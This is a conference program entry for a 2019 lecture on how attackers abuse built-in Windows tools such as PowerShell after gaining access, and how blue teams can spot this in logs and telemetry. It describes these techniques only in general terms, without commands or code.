lecture: Legitimate tools or weapons of mass compromise?


Windows desktop and servers contain a large number of legitimate tools which can also be used by attackers, once they obtain initial access. This presentation describes those tools and their usage in real world attacks.

Centralised logging and telemetry provides a wealth of information for blue team members and their day to day operations. These sources usually contain enough data to detect when attackers were successful in compromising the defended network.

But how to recognise a successful attack when the tools the attackers are using are also legitimate system administration utilities? Most Windows administrators would agree that PowerShell is an essential system administration tool but it has been frequently seen as an attack avenue for attackers and red team activities.

For example, we often observe Powershell activity in ransomware attacks, malicious crypto mining and even more serious targeted attacks. Powershell is typically used to load code from remote servers and make the attacks “fileless” using reflective dll loading, steal user credentials, pivot within the compromised network and execute other offensive tasks.

Right from the initial compromise we can expect the attackers to use standard Windows tools for enumerating the network, adding new users, pivoting to other servers, dumping databases, exfiltrating data etc.

This session will be a walkthrough of attackers techniques using tools which can also be considered legitimate and are usually installed by default on Windows. We will talk about basic and advanced functionality of these legitimate weapons and show their usage in recent real world attacks.


Day: 2019-09-13
Start time: 17:00
Duration: 01:00
Room: Tesla


Concurrent events